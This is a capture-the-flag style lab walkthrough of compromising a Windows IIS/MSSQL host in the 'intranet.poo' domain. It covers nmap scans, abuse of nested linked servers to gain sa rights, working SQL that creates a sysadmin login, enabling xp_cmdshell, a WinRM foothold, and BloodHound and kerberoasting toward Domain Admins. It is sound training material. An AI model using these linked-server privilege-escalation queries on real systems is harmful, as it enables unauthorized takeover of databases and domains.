80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-19T12:27:43+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
we can see
HTTP Microsoft IIS httpd 10.0 server
domain name intranet.poo we can add this to our hosts file
mssql server 2017
Lets check out the webserver
Looks like a default IIS server
Lets run feroxbuster and see if we can discover anything
Lets check for any vhosts
Nothing interesting
Lets run nikto to see if we can find any vulnerabilities
we do se somthing interesting
We can see the web server has a .DS_Store file withim the servers Root directory
what is a .DS_Store file ?
it is a hidden file that is automatically created by MacOS operating system when a user opens a folder with the Finder application. The file contains information about which files are in the folder and contains options such as what icons look like.
Why do we care?
here is a great blog that can explain that better then myself
essentialy we can utilize the "~" tilde to enumerate files and folders on the IIS server. we can use the tilde to discover the first six characters of files and folders along with there extension
Lets see if we can authenticate to the mssql server
first i want to see if ica n run commands with the xp_cmdshell
no luck
Lets conduct some basic enumeration
mssql version
List the databases
current datebase
couldnt find anything to interesting
We could utilize a mssql server link and point it to an external source
Lets find our current servers name
we can check for linked servers, we can query the sysservers table
we can see there is another linked remote server POO_CONFIG
we can utilize the EXECUTE to run queries on other servers
example
after enumerating further there wasnt anything to interesting
Lets see if we can get POO_CONFIG to execute queries on POO_PUBLIC
notice how the command ran as the 'sa' users, from what i can tell this is most likely a configuration issue, the issue resides in allowing any users on POO_PUBLIC the ability to run queries on POO_CONFIG as the internal users, but the second link looks like it allows any user from the POO_CONFIG to run queries as the 'sa' user
we can see when when we check our permissions through POO_CONFIG -> POO_PUBLIC
we can see we have ALL the permissions
Lets create a new 'sa' user with a password so we dont have to keep relying on server links
creating a user
giving our user the necassary permissions
Lets login via our newly created user
we are now logged in as a systems administrator
reading the flag
Lets enable xp_cmdshell
Note: when we have triggers in place these are essentialy a policy put in place to alert and block attempts at certain actions such as enabling xp_cmdshell, these triggers reside in the sys.server_triggers
we can disable them by
Now that we have command execution our next bet will be to estblish a revers-shell on the system
Lets check out the web.config file
Alright i want to try and find a way to access this file
fun fact, when a webserver is enabled to run the stored procedure sp_execute_external_script, and that it is configured to do that as a different user, so lets try and use the this particular procedure to run a simple python script
we can see this procedure is running under the user of poo_public01
Lets see if we can read the web.config file now
and we know have the contents of web.config file
Lets try these creds at the /admin login prompt we found earlier
they work
i dont see a way in the terms of a foothold within this page, lets go back our mssql client and enumerate the machine further
we do find an IPv6 address
Lets see what nmap can find on this address
results
we can see winrm is enabled, meaning we should be able to use evil-winrm and gain access to the machine
we need to add the the hostname and IP address to our hosts file
COMPATIBILITY
Now we should be able to win-rm into the machine
it worked
Now we need to find a way of pivoting
we can upload SharpHound.exe via winrm, but try to execute the tool we encounter some problems, Since Administrator is not a domain account we cant query the domain, so we will run SharpHound.exe via our mssql client since we have access to a service account shrek123 we can impersonate a computer account which can query the domain
upload SharpHound.exe via winrm
execute SharpHound.exe via mssqlclient
Now we can download the output zip file onto our local machine and ingest it to bllodhound
Looking through bloodhound we can see within the built in query Shortest Paths to domain admins from kerberoastable users
we can see the user P00_ADM@INTRANET.POO is a member off the help desk and has GnericAll privileges on the Domain Admins group, meaning we can add any member to the Domain Admins group
Lets perform some kerberoasting on the user P00_ADM@INTRANET.POO
we will utilize the Invoke-Kerberoast,ps1 script from
EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG]
EXECUTE ('EXECUTE (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
EXECUTE('EXECUTE(''CREATE LOGIN shrek123 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''shrek123'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
sudo nmap -A -6 -p- --min-rate 10000 dead:beef::1001
Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| dead:beef::1001:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-20T02:31:26+00:00; +2s from scanner time.
| ms-sql-info:
| dead:beef::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
TRACEROUTE
HOP RTT ADDRESS
1 297.48 ms dead:beef::1001
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.85 seconds
